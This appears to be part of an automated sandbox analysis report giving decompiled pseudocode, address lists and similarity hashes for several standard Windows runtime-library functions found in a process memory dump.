0x00b0bea2
0x00b0be8d
0x00b0be8d
0x00b0be92
0x00000000
0x00b0be92
0x00b0be8b
0x00b0be60
0x00b0be3b
0x00b0be3b
0x00b0be3e
0x00000000
0x00b0be40
0x00b0be40
0x00b0be44
0x00000000
0x00000000
0x00000000
0x00000000
0x00b0be44
0x00b0be3e
0x00b0be29
0x00b0be29
0x00000000
0x00b0be29
0x00b0be27
0x00000000
0x00acfba7
0x00acfba7
0x00acfbab
0x00b0bf02
0x00acfbb1
0x00acfbb1
0x00acfbb8
0x00acfbbd
0x00acfbbd
0x00acfbbf
0x00acfbbf
0x00acfbc5
0x00acfbcb
0x00acfbf8
0x00acfbf8
0x00acfbfa
0x00000000
0x00acfc00
0x00acfc00
0x00acfc03
0x00000000
0x00acfc09
0x00acfc09
0x00acfc0f
0x00acfc15
0x00acfc23
0x00acfc23
0x00acfc25
0x00acfc27
0x00acfc75
0x00acfc7c
0x00acfc84
0x00000000
0x00acfc29
0x00acfc29
0x00acfc2d
0x00acfc30
0x00b0bf0f
0x00000000
0x00acfc36
0x00acfc38
0x00acfc3b
0x00acfc41
0x00b0bf17
0x00b0bf19
0x00b0bf48
0x00b0bf4b
0x00000000
0x00b0bf1b
0x00b0bf22
0x00b0bf24
0x00b0bf26
0x00000000
0x00b0bf2c
0x00b0bf37
0x00b0bf39
0x00b0bf3b
0x00000000
0x00b0bf41
0x00b0bf41
0x00b0bf41
0x00b0bf41
0x00b0bf45
0x00000000
0x00b0bf45
0x00b0bf3b
0x00b0bf26
0x00000000
0x00acfc47
0x00acfc47
0x00acfc49
0x00acfcb2
0x00acfcb4
0x00acfcb6
0x00acfcdc
0x00acfcdc
0x00000000
0x00acfcb8
0x00acfcc3
0x00acfcc5
0x00acfcc7
0x00000000
0x00acfcc9
0x00acfcc9
0x00acfccd
0x00000000
0x00acfccd
0x00acfcc7
0x00000000
0x00acfc4b
0x00acfc4b
0x00acfc4e
0x00acfc4e
0x00acfc51
0x00acfc51
0x00acfc54
0x00acfc5a
0x00acfc5c
0x00acfc5f
0x00acfc61
0x00acfc63
0x00acfc65
0x00acfc67
0x00acfc6e
0x00acfc72
0x00acfc72
0x00acfc72
0x00acfc72
0x00acfc67
0x00acfc61
0x00000000
0x00acfc5a
0x00acfc49
0x00acfc41
0x00acfc30
0x00acfc27
0x00acfc03
0x00acfbcd
0x00acfbd3
0x00acfbd9
0x00acfbdc
0x00acfbde
0x00acfc99
0x00acfc9b
0x00acfc9d
0x00acfcd5
0x00acfcd5
0x00acfc89
0x00acfc89
0x00000000
0x00acfc9f
0x00acfc9f
0x00acfca3
0x00000000
0x00acfca3
0x00000000
0x00acfbe4
0x00acfbe4
0x00acfbe4
0x00acfbe4
0x00acfbe9
0x00acfbf2
0x00000000
0x00acfbf2
0x00acfbde
0x00acfbcb
0x00acfbab
0x00acfc8b
0x00acfc8b
0x00acfc8c
0x00acfb80
0x00acfb72
0x00acfb5e
0x00acfc8d
0x00acfc91
0x00acfadf
0x00acfadf
0x00acfae1
0x00acfae4
0x00acfae7
0x00acfaec
0x00acfaf8
0x00acfb00
0x00acfb07
0x00acfb0f
0x00acfb0f
0x00acfb07
0x00000000
0x00acfaf8
0x00acfadd

Strings

*** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!, xrefs: 00B0BE0F

Memory Dump Source

Source File: 00000001.00000002.744681975.0000000000A70000.00000040.00000001.sdmp, Offset: 00A70000, based on PE: true

Similarity

API ID:
String ID: *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!
API String ID: 0-865735534
Opcode ID: d71662fd511cf66d984c5b56226a724a79daf20c00e38c270ed751767e16c15a
Instruction ID: c201d45a8d17fd6b1754d15508b65afa2fae937fbd5bbd1b12c9b054854aa2b6
Opcode Fuzzy Hash: d71662fd511cf66d984c5b56226a724a79daf20c00e38c270ed751767e16c15a
Instruction Fuzzy Hash: 5DA1DF71B0460A8FDB25DB68C850FAAB7F6EB49714F1546BEE806DB691DB30DC01CB90

Uniqueness

Uniqueness Score: -1.00%

Function 00A92D8A, Relevance: 1.4, Strings: 1, Instructions: 191
COMMON

Download Yara Rule

C-Code - Quality: 63%

			E00A92D8A(void* __ebx, signed char __ecx, signed int __edx, signed int __edi) {
				signed char _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				signed int _v52;
				void* __esi;
				void* __ebp;
				intOrPtr _t55;
				signed int _t57;
				signed int _t58;
				char* _t62;
				signed char* _t63;
				signed char* _t64;
				signed int _t67;
				signed int _t72;
				signed int _t77;
				signed int _t78;
				signed int _t88;
				intOrPtr _t89;
				signed char _t93;
				signed int _t97;
				signed int _t98;
				signed int _t102;
				signed int _t103;
				intOrPtr _t104;
				signed int _t105;
				signed int _t106;
				signed char _t109;
				signed int _t111;
				void* _t116;

				_t102 = __edi;
				_t97 = __edx;
				_v12 = _v12 & 0x00000000;
				_t55 =  *[fs:0x18];
				_t109 = __ecx;
				_v8 = __edx;
				_t86 = 0;
				_v32 = _t55;
				_v24 = 0;
				_push(__edi);
				if(__ecx == 0xb85350) {
					_t86 = 1;
					_v24 = 1;
					 *((intOrPtr*)(_t55 + 0xf84)) = 1;
				}
				_t103 = _t102 | 0xffffffff;
				if( *0xb87bc8 != 0) {
					_push(0xc000004b);
					_push(_t103);
					L00AD97C0();
				}
				if( *0xb879c4 != 0) {
					_t57 = 0;
				} else {
					_t57 = 0xb879c8;
				}
				_v16 = _t57;
				if( *((intOrPtr*)(_t109 + 0x10)) == 0) {
					_t93 = _t109;
					L23();
				}
				_t58 =  *_t109;
				if(_t58 == _t103) {
					__eflags =  *(_t109 + 0x14) & 0x01000000;
					_t58 = _t103;
					if(__eflags == 0) {
						_t93 = _t109;
						E00AC1624(_t86, __eflags);
						_t58 =  *_t109;
					}
				}
				_v20 = _v20 & 0x00000000;
				if(_t58 != _t103) {
					 *((intOrPtr*)(_t58 + 0x14)) =  *((intOrPtr*)(_t58 + 0x14)) + 1;
				}
				_t104 =  *((intOrPtr*)(_t109 + 0x10));
				_t88 = _v16;
				_v28 = _t104;
				L9:
				while(1) {
					if(E00AB7D50() != 0) {
						_t62 = ( *[fs:0x30])[0x50] + 0x228;
					} else {
						_t62 = 0x7ffe0382;
					}
					if( *_t62 != 0) {
						_t63 =  *[fs:0x30];
						__eflags = _t63[0x240] & 0x00000002;
						if((_t63[0x240] & 0x00000002) != 0) {
							_t93 = _t109;
							E00B2FE87(_t93);
						}
					}
					if(_t104 != 0xffffffff) {
						_push(_t88);
						_push(0);
						_push(_t104);
						_t64 = E00AD9520();
						goto L15;
					} else {
						while(1) {
							_t97 =  &_v8;
							_t64 = E00ACE18B(_t109 + 4, _t97, 4, _t88, 0);
							if(_t64 == 0x102) {
								break;
							}
							_t93 =  *(_t109 + 4);
							_v8 = _t93;
							if((_t93 & 0x00000002) != 0) {
								continue;
							}
							L15:
							if(_t64 == 0x102) {
								break;
							}
							_t89 = _v24;
							if(_t64 < 0) {
								L00AEDF30(_t93, _t97, _t64);
								_push(_t93);
								_t98 = _t97 | 0xffffffff;
								__eflags =  *0xb86901;
								_push(_t109);
								_v52 = _t98;
								if( *0xb86901 != 0) {
									_push(0);
									_push(1);
									_push(0);
									_push(0x100003);
									_push( &_v12);
									_t72 = E00AD9980();
									__eflags = _t72;
									if(_t72 < 0) {
										_v12 = _t98 | 0xffffffff;
									}
								}
								asm("lock cmpxchg [ecx], edx");
								_t111 = 0;
								__eflags = 0;
								if(0 != 0) {
									__eflags = _v12 - 0xffffffff;
									if(_v12 != 0xffffffff) {
										_push(_v12);
										E00AD95D0();
									}
								} else {
									_t111 = _v12;
								}
								return _t111;
							} else {
								if(_t89 != 0) {
									 *((intOrPtr*)(_v32 + 0xf84)) = 0;
									_t77 = E00AB7D50();
									__eflags = _t77;
									if(_t77 == 0) {
										_t64 = 0x7ffe0384;
									} else {
										_t64 = ( *[fs:0x30])[0x50] + 0x22a;
									}
									__eflags =  *_t64;
									if( *_t64 != 0) {
										_t64 =  *[fs:0x30];
										__eflags = _t64[0x240] & 0x00000004;
										if((_t64[0x240] & 0x00000004) != 0) {
											_t78 = E00AB7D50();
											__eflags = _t78;
											if(_t78 == 0) {
												_t64 = 0x7ffe0385;
											} else {
												_t64 = ( *[fs:0x30])[0x50] + 0x22b;
											}
											__eflags =  *_t64 & 0x00000020;
											if(( *_t64 & 0x00000020) != 0) {
												_t64 = E00B17016(0x1483, _t97 | 0xffffffff, 0xffffffff, 0xffffffff, 0, 0);
											}
										}
									}
								}
								return _t64;
							}
						}
						_t97 = _t88;
						_t93 = _t109;
						E00B2FDDA(_t97, _v12);
						_t105 =  *_t109;
						_t67 = _v12 + 1;
						_v12 = _t67;
						__eflags = _t105 - 0xffffffff;
						if(_t105 == 0xffffffff) {
							_t106 = 0;
							__eflags = 0;
						} else {
							_t106 =  *(_t105 + 0x14);
						}
						__eflags = _t67 - 2;
						if(_t67 > 2) {
							__eflags = _t109 - 0xb85350;
							if(_t109 != 0xb85350) {
								__eflags = _t106 - _v20;
								if(__eflags == 0) {
									_t93 = _t109;
									L00B2FFB9(_t88, _t93, _t97, _t106, _t109, __eflags);
								}
							}
						}
						_push("RTL: Re-Waiting\n");
						_push(0);
						_push(0x65);
						_v20 = _t106;
						L00B25720();
						_t104 = _v28;
						_t116 = _t116 + 0xc;
						continue;
					}
				}
			}

0x00a92d8a
0x00a92d8a
0x00a92d92
0x00a92d96
0x00a92d9e
0x00a92da0
0x00a92da3
0x00a92da5
0x00a92da8
0x00a92dab
0x00a92db2
0x00aef9aa
0x00aef9ab
0x00aef9ae
0x00aef9ae
0x00a92db8
0x00a92dc2
0x00aef9b9
0x00aef9be
0x00aef9bf
0x00aef9bf
0x00a92dcf
0x00aef9c9
0x00a92dd5
0x00a92dd5
0x00a92dd5
0x00a92dde
0x00a92de1
0x00a92e70
0x00a92e72
0x00a92e72
0x00a92de7
0x00a92deb
0x00a92e7c
0x00a92e83
0x00a92e85
0x00a92e8b
0x00a92e8d
0x00a92e92
0x00a92e92
0x00a92e85
0x00a92df1
0x00a92df7
0x00a92df9
0x00a92df9
0x00a92dfc
0x00a92dff
0x00a92e02
0x00000000
0x00a92e05
0x00a92e0c
0x00aef9d9
0x00a92e12
0x00a92e12
0x00a92e12
0x00a92e1a
0x00aef9e3
0x00aef9e9
0x00aef9f0
0x00aef9f6
0x00aef9f8
0x00aef9f8
0x00aef9f0
0x00a92e23
0x00aefa02
0x00aefa03
0x00aefa05
0x00aefa06
0x00000000
0x00a92e29
0x00a92e29
0x00a92e2e
0x00a92e34
0x00a92e3e
0x00000000
0x00000000
0x00a92e44
0x00a92e47
0x00a92e4d
0x00000000
0x00000000
0x00a92e4f
0x00a92e54
0x00000000
0x00000000
0x00a92e5a
0x00a92e5f
0x00a92e9a
0x00a92ea4
0x00a92ea5
0x00a92ea8
0x00a92eaf
0x00a92eb2
0x00a92eb5
0x00aefae9
0x00aefaeb
0x00aefaed
0x00aefaef
0x00aefaf7
0x00aefaf8
0x00aefafd
0x00aefaff
0x00aefb04
0x00aefb04
0x00aefaff
0x00a92ec0
0x00a92ec4
0x00a92ec6
0x00a92ec8
0x00aefb14
0x00aefb18
0x00aefb1e
0x00aefb21
0x00aefb21
0x00a92ece
0x00a92ece
0x00a92ece
0x00a92ed7
0x00a92e61
0x00a92e63
0x00aefa6b
0x00aefa71
0x00aefa76
0x00aefa78
0x00aefa8a
0x00aefa7a
0x00aefa83
0x00aefa83
0x00aefa8f
0x00aefa91
0x00aefa97
0x00aefa9d
0x00aefaa4
0x00aefaaa
0x00aefaaf
0x00aefab1
0x00aefac3
0x00aefab3
0x00aefabc
0x00aefabc
0x00aefac8
0x00aefacb
0x00aefadf
0x00aefadf
0x00aefacb
0x00aefaa4
0x00aefa91
0x00a92e6f
0x00a92e6f
0x00a92e5f
0x00aefa13
0x00aefa15
0x00aefa17
0x00aefa1f
0x00aefa21
0x00aefa22
0x00aefa25
0x00aefa28
0x00aefa2f
0x00aefa2f
0x00aefa2a
0x00aefa2a
0x00aefa2a
0x00aefa31
0x00aefa34
0x00aefa36
0x00aefa3c
0x00aefa3e
0x00aefa41
0x00aefa43
0x00aefa45
0x00aefa45
0x00aefa41
0x00aefa3c
0x00aefa4a
0x00aefa4f
0x00aefa51
0x00aefa53
0x00aefa56
0x00aefa5b
0x00aefa5e
0x00000000
0x00aefa5e
0x00a92e23

Strings

RTL: Re-Waiting, xrefs: 00AEFA4A

Memory Dump Source

Source File: 00000001.00000002.744681975.0000000000A70000.00000040.00000001.sdmp, Offset: 00A70000, based on PE: true

Similarity

API ID:
String ID: RTL: Re-Waiting
API String ID: 0-316354757
Opcode ID: ed7faba22a293953e9bb2e2290b08fc29467aaa1711f1e9fcb3926223bde5466
Instruction ID: 54cdc8d8e9fd9dd6cce02004ca7849d584ddc0904b12814d699ebba287364096
Opcode Fuzzy Hash: ed7faba22a293953e9bb2e2290b08fc29467aaa1711f1e9fcb3926223bde5466
Instruction Fuzzy Hash: F561FD31B00684AFDF21DB69C884B7EBBF5EB44354F2406BAE8159B2D2CB349D00C781

Uniqueness

Uniqueness Score: -1.00%

Function 00A952A5, Relevance: 1.4, Strings: 1, Instructions: 161
COMMON

Download Yara Rule

C-Code - Quality: 78%

			E00A952A5(char __ecx) {
				char _v20;
				char _v28;
				char _v29;
				void* _v32;
				void* _v36;
				void* _v37;
				void* _v38;
				void* _v40;
				void* _v46;
				void* _v64;
				void* __ebx;
				intOrPtr* _t49;
				signed int _t53;
				short _t85;
				signed int _t87;
				signed int _t88;
				signed int _t89;
				intOrPtr _t101;
				intOrPtr* _t102;
				intOrPtr* _t104;
				signed int _t106;
				void* _t108;

				_t93 = __ecx;
				_t108 = (_t106 & 0xfffffff8) - 0x1c;
				_push(_t88);
				_v29 = __ecx;
				_t89 = _t88 | 0xffffffff;
				while(1) {
					E00AAEEF0(0xb879a0);
					_t104 =  *0xb88210; // 0x632c28
					if(_t104 == 0) {
						break;
					}
					asm("lock inc dword [esi]");
					 *((intOrPtr*)(_t108 + 0x18)) =  *((intOrPtr*)(_t104 + 8));
					E00AAEB70(_t93, 0xb879a0);
					if( *((char*)(_t108 + 0xf)) != 0) {
						_t101 =  *0x7ffe02dc;
						__eflags =  *(_t104 + 0x14) & 0x00000001;
						if(( *(_t104 + 0x14) & 0x00000001) != 0) {
							L9:
							_push(0);
							_push(0);
							_push(0);
							_push(0);
							_push(0x90028);
							_push(_t108 + 0x20);
							_push(0);
							_push(0);
							_push(0);
							_push( *((intOrPtr*)(_t104 + 4)));
							_t53 = E00AD9890();
							__eflags = _t53;
							if(_t53 >= 0) {
								__eflags =  *(_t104 + 0x14) & 0x00000001;
								if(( *(_t104 + 0x14) & 0x00000001) == 0) {
									E00AAEEF0(0xb879a0);
									 *((intOrPtr*)(_t104 + 8)) = _t101;
									E00AAEB70(0, 0xb879a0);
								}
								goto L3;
							}
							__eflags = _t53 - 0xc0000012;
							if(__eflags == 0) {
								L12:
								_t13 = _t104 + 0xc; // 0x632c35
								_t93 = _t13;
								 *((char*)(_t108 + 0x12)) = 0;
								__eflags = E00ACF0BF(_t13,  *(_t104 + 0xe) & 0x0000ffff, __eflags,  &_v28);
								if(__eflags >= 0) {
									L15:
									_t102 = _v28;
									 *_t102 = 2;
									 *((intOrPtr*)(_t108 + 0x18)) =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x24;
									E00AAEEF0(0xb879a0);
									__eflags =  *0xb88210 - _t104; // 0x632c28
									if(__eflags == 0) {
										__eflags =  *((char*)(_t108 + 0xe));
										_t95 =  *((intOrPtr*)(_t108 + 0x14));
										 *0xb88210 = _t102;
										_t32 = _t102 + 0xc; // 0x0
										 *_t95 =  *_t32;
										_t33 = _t102 + 0x10; // 0x0
										 *((intOrPtr*)(_t95 + 4)) =  *_t33;
										_t35 = _t102 + 4; // 0xffffffff
										 *((intOrPtr*)(_t95 + 8)) =  *_t35;
										if(__eflags != 0) {
											_t95 =  *((intOrPtr*)( *((intOrPtr*)(_t104 + 0x10))));
											E00B14888(_t89,  *((intOrPtr*)( *((intOrPtr*)(_t104 + 0x10)))), __eflags);
										}
										E00AAEB70(_t95, 0xb879a0);
										asm("lock xadd [esi], eax");
										if(__eflags == 0) {
											_push( *((intOrPtr*)(_t104 + 4)));
											E00AD95D0();
											L00AB77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
											_t102 =  *((intOrPtr*)(_t108 + 0x10));
										}
										asm("lock xadd [esi], ebx");
										__eflags = _t89 == 1;
										if(_t89 == 1) {
											_push( *((intOrPtr*)(_t104 + 4)));
											E00AD95D0();
											L00AB77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
											_t102 =  *((intOrPtr*)(_t108 + 0x10));
										}
										_t49 = _t102;
										L4:
										return _t49;
									}
									E00AAEB70(_t93, 0xb879a0);
									asm("lock xadd [esi], eax");
									if(__eflags == 0) {
										_push( *((intOrPtr*)(_t104 + 4)));
										E00AD95D0();
										L00AB77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
										_t102 =  *((intOrPtr*)(_t108 + 0x10));
									}
									 *_t102 = 1;
									asm("lock xadd [edi], eax");
									if(__eflags == 0) {
										_t28 = _t102 + 4; // 0xffffffff
										_push( *_t28);
										E00AD95D0();
										L00AB77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t102);
									}
									continue;
								}
								_t93 =  &_v20;
								 *((intOrPtr*)(_t108 + 0x20)) =  *((intOrPtr*)(_t104 + 0x10));
								_t85 = 6;
								_v20 = _t85;
								_t87 = E00ACF0BF( &_v20,  *(_t104 + 0xe) & 0x0000ffff, __eflags,  &_v28);
								__eflags = _t87;
								if(_t87 < 0) {
									goto L3;
								}
								 *((char*)(_t108 + 0xe)) = 1;
								goto L15;
							}
							__eflags = _t53 - 0xc000026e;
							if(__eflags != 0) {
								goto L3;
							}
							goto L12;
						}
						__eflags = 0x7ffe02dc -  *((intOrPtr*)(_t108 + 0x14));
						if(0x7ffe02dc ==  *((intOrPtr*)(_t108 + 0x14))) {
							goto L3;
						} else {
							goto L9;
						}
					}
					L3:
					_t49 = _t104;
					goto L4;
				}
				_t49 = 0;
				goto L4;
			}

0x00a952a5
0x00a952ad
0x00a952b0
0x00a952b3
0x00a952b7
0x00a952ba
0x00a952bf
0x00a952c4
0x00a952cc
0x00000000
0x00000000
0x00a952ce
0x00a952d9
0x00a952dd
0x00a952e7
0x00a952f7
0x00a952f9
0x00a952fd
0x00af0dcf
0x00af0dd5
0x00af0dd6
0x00af0dd7
0x00af0dd8
0x00af0dd9
0x00af0dde
0x00af0ddf
0x00af0de0
0x00af0de1
0x00af0de2
0x00af0de5
0x00af0dea
0x00af0dec
0x00af0f60
0x00af0f64
0x00af0f70
0x00af0f76
0x00af0f79
0x00af0f79
0x00000000
0x00af0f64
0x00af0df2
0x00af0df7
0x00af0e04
0x00af0e0d
0x00af0e0d
0x00af0e10
0x00af0e1a
0x00af0e1c
0x00af0e4c
0x00af0e52
0x00af0e61
0x00af0e67
0x00af0e6b
0x00af0e70
0x00af0e76
0x00af0ed7
0x00af0edc
0x00af0ee0
0x00af0ee6
0x00af0eea
0x00af0eed
0x00af0ef0
0x00af0ef3
0x00af0ef6
0x00af0ef9
0x00af0efe
0x00af0f01
0x00af0f01
0x00af0f0b
0x00af0f12
0x00af0f16
0x00af0f18
0x00af0f1b
0x00af0f2c
0x00af0f31
0x00af0f31
0x00af0f35
0x00af0f39
0x00af0f3a
0x00af0f3c
0x00af0f3f
0x00af0f50
0x00af0f55
0x00af0f55
0x00af0f59
0x00a952eb
0x00a952f1
0x00a952f1
0x00af0e7d
0x00af0e84
0x00af0e88
0x00af0e8a
0x00af0e8d
0x00af0e9e
0x00af0ea3
0x00af0ea3
0x00af0ea7
0x00af0eaf
0x00af0eb3
0x00af0eb9
0x00af0eb9
0x00af0ebc
0x00af0ecd
0x00af0ecd
0x00000000
0x00af0eb3
0x00af0e21
0x00af0e2b
0x00af0e2f
0x00af0e30
0x00af0e3a
0x00af0e3f
0x00af0e41
0x00000000
0x00000000
0x00af0e47
0x00000000
0x00af0e47
0x00af0df9
0x00af0dfe
0x00000000
0x00000000
0x00000000
0x00af0dfe
0x00a95303
0x00a95307
0x00000000
0x00a95309
0x00000000
0x00a95309
0x00a95307
0x00a952e9
0x00a952e9
0x00000000
0x00a952e9
0x00a9530e
0x00000000

Strings

(,c, xrefs: 00A952C4, 00AF0E70, 00AF0EE0

Memory Dump Source

Source File: 00000001.00000002.744681975.0000000000A70000.00000040.00000001.sdmp, Offset: 00A70000, based on PE: true

Similarity

API ID:
String ID: (,c
API String ID: 0-613782790
Opcode ID: 69904f8abdfb1b1894cf5fab8d199d39f5d91ec06394b5503fb5aab2c872b154
Instruction ID: 9cb5bcc91fc8114c3fc63f1bf1d9b2e4846dcb78a77e95e9d07f47fef992410f
Opcode Fuzzy Hash: 69904f8abdfb1b1894cf5fab8d199d39f5d91ec06394b5503fb5aab2c872b154
Instruction Fuzzy Hash: F051DF31209741AFC722EF68C942B6BBBE8FF50710F10091EF495876A2EB70E844C792

Uniqueness

Uniqueness Score: -1.00%

Function 00B60EA5, Relevance: 1.4, Strings: 1, Instructions: 153
COMMON

Download Yara Rule

C-Code - Quality: 80%

			E00B60EA5(void* __ecx, void* __edx) {
				signed int _v20;
				char _v24;
				intOrPtr _v28;
				unsigned int _v32;
				signed int _v36;
				intOrPtr _v40;
				char _v44;
				intOrPtr _v64;
				void* __ebx;
				void* __edi;
				signed int _t58;
				unsigned int _t60;
				intOrPtr _t62;
				char* _t67;
				char* _t69;
				void* _t80;
				void* _t83;
				intOrPtr _t93;
				intOrPtr _t115;
				char _t117;
				void* _t120;

				_t83 = __edx;
				_t117 = 0;
				_t120 = __ecx;
				_v44 = 0;
				if(L00B5FF69(__ecx,  &_v44,  &_v32) < 0) {
					L24:
					_t109 = _v44;
					if(_v44 != 0) {
						E00B61074(_t83, _t120, _t109, _t117, _t117);
					}
					L26:
					return _t117;
				}
				_t93 =  *((intOrPtr*)(__ecx + 0x3c));
				_t5 = _t83 + 1; // 0x1
				_v36 = _t5 << 0xc;
				_v40 = _t93;
				_t58 =  *(_t93 + 0xc) & 0x40000000;
				asm("sbb ebx, ebx");
				_t83 = ( ~_t58 & 0x0000003c) + 4;
				if(_t58 != 0) {
					_push(0);
					_push(0x14);
					_push( &_v24);
					_push(3);
					_push(_t93);
					_push(0xffffffff);
					_t80 = L00AD9730();
					_t115 = _v64;
					if(_t80 < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t115) {
						_push(_t93);
						E00B5A80D(_t115, 1, _v20, _t117);
						_t83 = 4;
					}
				}
				if(E00B5A854( &_v44,  &_v36, _t117, 0x40001000, _t83, _t117,  *((intOrPtr*)(_t120 + 0x34)),  *((intOrPtr*)(_t120 + 0x38))) < 0) {
					goto L24;
				}
				_t60 = _v32;
				_t97 = (_t60 != 0x100000) + 1;
				_t83 = (_v44 -  *0xb88b04 >> 0x14) + (_v44 -  *0xb88b04 >> 0x14);
				_v28 = (_t60 != 0x100000) + 1;
				_t62 = _t83 + (_t60 >> 0x14) * 2;
				_v40 = _t62;
				if(_t83 >= _t62) {
					L10:
					asm("lock xadd [eax], ecx");
					asm("lock xadd [eax], ecx");
					if(E00AB7D50() == 0) {
						_t67 = 0x7ffe0380;
					} else {
						_t67 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
					}
					if( *_t67 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
						E00B5138A(_t83,  *((intOrPtr*)(_t120 + 0x3c)), _v44, _v36, 0xc);
					}
					if(E00AB7D50() == 0) {
						_t69 = 0x7ffe0388;
					} else {
						_t69 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
					}
					if( *_t69 != 0) {
						E00B4FEC0(_t83,  *((intOrPtr*)(_t120 + 0x3c)), _v44, _v32);
					}
					if(( *0xb88724 & 0x00000008) != 0) {
						E00B552F8( *((intOrPtr*)(_t120 + 0x3c)),  *((intOrPtr*)(_t120 + 0x28)));
					}
					_t117 = _v44;
					goto L26;
				}
				while(E00B615B5(0xb88ae4, _t83, _t97, _t97) >= 0) {
					_t97 = _v28;
					_t83 = _t83 + 2;
					if(_t83 < _v40) {
						continue;
					}
					goto L10;
				}
				goto L24;
			}

0x00b60eb7
0x00b60eb9
0x00b60ec0
0x00b60ec2
0x00b60ecd
0x00b6105b
0x00b6105b
0x00b61061
0x00b61066
0x00b61066
0x00b6106b
0x00b61073
0x00b61073
0x00b60ed3
0x00b60ed6
0x00b60edc
0x00b60ee0
0x00b60ee7
0x00b60ef0
0x00b60ef5
0x00b60efa
0x00b60efc
0x00b60efd
0x00b60f03
0x00b60f04
0x00b60f06
0x00b60f07
0x00b60f09
0x00b60f0e
0x00b60f14
0x00b60f23
0x00b60f2d
0x00b60f34
0x00b60f34
0x00b60f14
0x00b60f52
0x00000000
0x00000000
0x00b60f58
0x00b60f73
0x00b60f74
0x00b60f79
0x00b60f7d
0x00b60f80
0x00b60f86
0x00b60fab
0x00b60fb5
0x00b60fc6
0x00b60fd1
0x00b60fe3
0x00b60fd3
0x00b60fdc
0x00b60fdc
0x00b60feb
0x00b61009
0x00b61009
0x00b61015
0x00b61027
0x00b61017
0x00b61020
0x00b61020
0x00b6102f
0x00b6103c
0x00b6103c
0x00b61048
0x00b61050
0x00b61050
0x00b61055
0x00000000
0x00b61055
0x00b60f88
0x00b60f9e
0x00b60fa2
0x00b60fa9
0x00000000
0x00000000
0x00000000
0x00b60fa9
0x00000000

Strings

`, xrefs: 00B60F16

Memory Dump Source

Source File: 00000001.00000002.744681975.0000000000A70000.00000040.00000001.sdmp, Offset: 00A70000, based on PE: true

Similarity

API ID:
String ID: `
API String ID: 0-2679148245
Opcode ID: 41b81ba028ef315fddcd3f452a8c2acac664f6d0802e1786bd100b65f15b7296
Instruction ID: fd82ba6938445cecafc558bd23b4e46a92f80be7380f446ebcedef9d004ee019
Opcode Fuzzy Hash: 41b81ba028ef315fddcd3f452a8c2acac664f6d0802e1786bd100b65f15b7296
Instruction Fuzzy Hash: 2951DF712043429FD725DF29D981B2BB7E9EBC4304F0849ACF98697291D774EC45CB62

Uniqueness

Uniqueness Score: -1.00%

Function 00ACF0BF, Relevance: 1.4, Strings: 1, Instructions: 137
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E00ACF0BF(signed short* __ecx, signed short __edx, void* __eflags, intOrPtr* _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char* _v20;
				intOrPtr _v24;
				char _v28;
				intOrPtr _v32;
				char _v36;
				char _v44;
				char _v52;
				intOrPtr _v56;
				char _v60;
				intOrPtr _v72;
				void* _t51;
				void* _t58;
				signed short _t82;
				short _t84;
				signed int _t91;
				signed int _t100;
				signed short* _t103;
				void* _t108;
				intOrPtr* _t109;

				_t103 = __ecx;
				_t82 = __edx;
				_t51 = E00AB4120(0, __ecx, 0,  &_v52, 0, 0, 0);
				if(_t51 >= 0) {
					_push(0x21);
					_push(3);
					_v56 =  *0x7ffe02dc;
					_v20 =  &_v52;
					_push( &_v44);
					_v28 = 0x18;
					_push( &_v28);
					_push(0x100020);
					_v24 = 0;
					_push( &_v60);
					_v16 = 0x40;
					_v12 = 0;
					_v8 = 0;
					_t58 = E00AD9830();
					_t87 =  *[fs:0x30];
					_t108 = _t58;
					L00AB77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v72);
					if(_t108 < 0) {
						L11:
						_t51 = _t108;
					} else {
						_push(4);
						_push(8);
						_push( &_v36);
						_push( &_v44);
						_push(_v60);
						_t108 = E00AD9990();
						if(_t108 < 0) {
							L10:
							_push(_v60);
							E00AD95D0();
							goto L11;
						} else {
							_t109 = L00AB4620(_t87,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t82 + 0x18);
							if(_t109 == 0) {
								_t108 = 0xc0000017;
								goto L10;
							} else {
								_t21 = _t109 + 0x18; // 0x18
								 *((intOrPtr*)(_t109 + 4)) = _v60;
								 *_t109 = 1;
								 *((intOrPtr*)(_t109 + 0x10)) = _t21;
								 *(_t109 + 0xe) = _t82;
								 *((intOrPtr*)(_t109 + 8)) = _v56;
								 *((intOrPtr*)(_t109 + 0x14)) = _v32;
								E00ADF3E0(_t21, _t103[2],  *_t103 & 0x0000ffff);
								 *((short*)( *((intOrPtr*)(_t109 + 0x10)) + (( *_t103 & 0x0000ffff) >> 1) * 2)) = 0;
								 *((short*)(_t109 + 0xc)) =  *_t103;
								_t91 =  *_t103 & 0x0000ffff;
								_t100 = _t91 & 0xfffffffe;
								_t84 = 0x5c;
								if( *((intOrPtr*)(_t103[2] + _t100 - 2)) != _t84) {
									if(_t91 + 4 > ( *(_t109 + 0xe) & 0x0000ffff)) {
										_push(_v60);
										E00AD95D0();
										L00AB77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t109);
										_t51 = 0xc0000106;
									} else {
										 *((short*)(_t100 +  *((intOrPtr*)(_t109 + 0x10)))) = _t84;
										 *((short*)( *((intOrPtr*)(_t109 + 0x10)) + 2 + (( *_t103 & 0x0000ffff) >> 1) * 2)) = 0;
										 *((short*)(_t109 + 0xc)) =  *((short*)(_t109 + 0xc)) + 2;
										goto L5;
									}
								} else {
									L5:
									 *_a4 = _t109;
									_t51 = 0;
								}
							}
						}
					}
				}
				return _t51;
			}

0x00acf0d3
0x00acf0d9
0x00acf0e0
0x00acf0e7
0x00acf0f2
